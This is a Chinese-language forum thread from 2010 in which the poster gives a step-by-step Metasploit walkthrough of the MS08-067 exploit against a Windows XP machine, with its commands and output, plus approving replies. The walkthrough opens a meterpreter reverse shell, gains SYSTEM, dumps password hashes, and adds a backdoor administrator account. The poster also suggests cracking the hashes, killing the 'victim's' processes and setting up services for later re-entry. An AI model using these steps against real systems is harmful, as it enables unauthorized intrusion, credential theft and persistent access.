|
楼主 |
发表于 30-1-2010 09:27 PM
|
显示全部楼层
metaspoilt [ms08_067]
这次我是用了ubuntu 910 和自己安装的msf
运行msf,
#./opt/metaspoilt/msfconsole
然后就进行攻击咯。
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.19
RHOST => 192.168.1.19
注:RHOST是remote host,你要攻击的对象
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.17
LHOST => 192.168.1.17
注:LHOST是local host,是你运行msf的机器
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
注:LPORT是local port,你要用的port
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
注:然后就是payload了
msf exploit(ms08_067_netapi) > exploit
注:然后就进行攻击。
Started reverse handler on port 4444
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 2 - lang:English
Selected Target: Windows XP SP2 English (NX)
Triggering the vulnerability...
Sending stage (725504 bytes)
Meterpreter session 1 opened (192.168.1.17:4444 -> 192.168.1.19:1442)
注:看到最后一行吗?? 我们成功了
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
注:getuid来看看
meterpreter > run hashdump Obtaining the boot key... Calculating the hboot key using SYSKEY bb35d43e0a531b188967bb43ce0f4823... Obtaining the user list and keys... Decrypting user keys... Dumping password hashes...
Administrator:500:281b94b1e665a2b2aad3b435b51404ee:361db25d1614b529c719205dfc0d7420:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5416885c50a87bdd115df056849a0a33:62a470b79584552188d83ce96f2482b2:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:aff70073db96549d5ecceb973af24bcc:::
chenghui:1003:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
ASPNET:1004:7bb95a870045309f8d5f5b133fbbefd5:38982698a41a6030a410d68d50428bf3:::
admin:1011:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
__vmware_user__:1013:c9d38fa38122a3212d28a90ef0e5c0c5:3f06c5556c2f5aaeeb4cb499ab9681e7:::
注:run hashdump, 你dump全部user account的hash出来了。
如果你不要加入新的account,就自己想办法解码这些hash。
tips: cain and abel
meterpreter > shell
Process 4288 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
注:打shell,我就进入shell了。 不错嘛。 呵呵
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter VMware Network Adapter VMnet8:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.81.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter VMware Network Adapter VMnet1:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.136.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Wireless Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Ethernet adapter VirtualBox Host-Only Network:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.56.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.19
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
注:试看ipconfig, 果然works。
C:\WINDOWS\system32>net user a13x P@ssw0rd /add
net user a13x P@ssw0rd /add
The command completed successfully.
注:就自己adduser。 呵呵 windows command要多多练习。
C:\WINDOWS\system32>net localgroup Administrators a13x /add
net localgroup Administrators a13x /add
The command completed successfully.
注:把握自己add进去administrators group。 够力咯咯咯咯咯
接下来,你们自己可以选择玩net view ,net use。
也可以帮你的受害者干掉一些process 比如, tasklist ,taskkill
or 开启service,让你以后可以轻松进入。 net service
还是那句多多学习windows command 吧。
我攻击的机器是windows xp sp2, windows firewall on, mcafee disabled。 |
|
|
|
|
|
|
|
发表于 30-1-2010 10:05 PM
|
显示全部楼层
|
|
|
|
|
|
|
楼主 |
发表于 30-1-2010 10:14 PM
|
显示全部楼层
有人骄傲了。
atchek 发表于 30-1-2010 10:05 PM
鸟你。 以后不写了。 |
|
|
|
|
|
|
|
发表于 30-1-2010 10:43 PM
|
显示全部楼层
鸟你。 以后不写了。
hackintosh 发表于 30-1-2010 10:14 PM
   骄傲也是种赞美。 |
|
|
|
|
|
|
|
发表于 30-1-2010 11:11 PM
|
显示全部楼层
|
|
|
|
|
|
|
楼主 |
发表于 30-1-2010 11:58 PM
|
显示全部楼层
本帖最后由 hackintosh 于 30-1-2010 11:59 PM 编辑
我来踩场, ah kin 表打我
补充:
show exploits 可以查看 metaspoilt 里面收录的各种 exploits, ...
onlylonly 发表于 30-1-2010 11:11 PM
谢谢了。
真的还要谢谢他们用盗版windows,不然那里有机会。 呵呵
我的netbook load msf的时候不是很顺。
后悔了,因该等多一下。 买 asus eeepc 1201n才对。 出手太快了。
haih |
|
|
|
|
|
|
|
发表于 31-1-2010 01:20 AM
|
显示全部楼层
支持好贴!~ |
|
|
|
|
|
|
|
发表于 31-1-2010 02:37 AM
|
显示全部楼层
已经买了蹭网卡来学习了 |
|
|
|
|
|
|
|
楼主 |
发表于 31-1-2010 03:34 AM
|
显示全部楼层
已经买了蹭网卡来学习了
megablue 发表于 31-1-2010 02:37 AM
跟教主买了 ???
看来教主又在赚钱了 。 呵呵 |
|
|
|
|
|
|
|
发表于 31-1-2010 08:58 AM
|
显示全部楼层
|
|
|
|
|
|
|
发表于 31-1-2010 11:19 AM
|
显示全部楼层
终于讨到精华了
继续加油!! |
|
|
|
|
|
|
|
楼主 |
发表于 31-1-2010 03:34 PM
|
显示全部楼层
终于讨到精华了
继续加油!!
bomber27 发表于 31-1-2010 11:19 AM
因为你的至此后,是我写帖子的动力。 呵呵 |
|
|
|
|
|
|
|
发表于 31-1-2010 03:58 PM
|
显示全部楼层
回复 32# hackintosh
原来我有一半功劳,100分拿来 |
|
|
|
|
|
|
|
楼主 |
发表于 31-1-2010 04:10 PM
|
显示全部楼层
回复 hackintosh
原来我有一半功劳,100分拿来
bomber27 发表于 31-1-2010 03:58 PM
其实我都不知道加了多少分咯
如何给你,呵呵 |
|
|
|
|
|
|
|
发表于 4-2-2010 07:56 PM
|
显示全部楼层
|
|
|
|
|
|
|
发表于 14-2-2010 09:27 AM
|
显示全部楼层
@Hackintosh:
我手上现在有BT4 (Custom made by www.nohack.cn,买书随送的,加了一些tools及修改了一些bug)不知道你要吗?你要的话,我可以upload给你。 |
|
|
|
|
|
|
|
发表于 14-2-2010 11:49 AM
|
显示全部楼层
回复 36# cutegal88
好的东西和大家分享!!!!! |
|
|
|
|
|
|
|
发表于 14-2-2010 11:56 PM
|
显示全部楼层
本帖最后由 cutegal88 于 15-2-2010 01:24 PM 编辑
BackTrack 4 Custom Made by www.nohack.cn
|
|
|
|
|
|
|
|
发表于 16-2-2010 02:22 AM
|
显示全部楼层
回复 38# cutegal88
妈妈说过年不可以下载黑的东西 |
|
|
|
|
|
|
|
发表于 16-2-2010 08:38 AM
|
显示全部楼层
回复 cutegal88
妈妈说过年不可以下载黑的东西
megablue 发表于 16-2-2010 02:22 AM
这样的话,我就remove link及关掉我的server,就搞定了。哈哈 |
|
|
|
|
|
|
| |
本周最热论坛帖子
|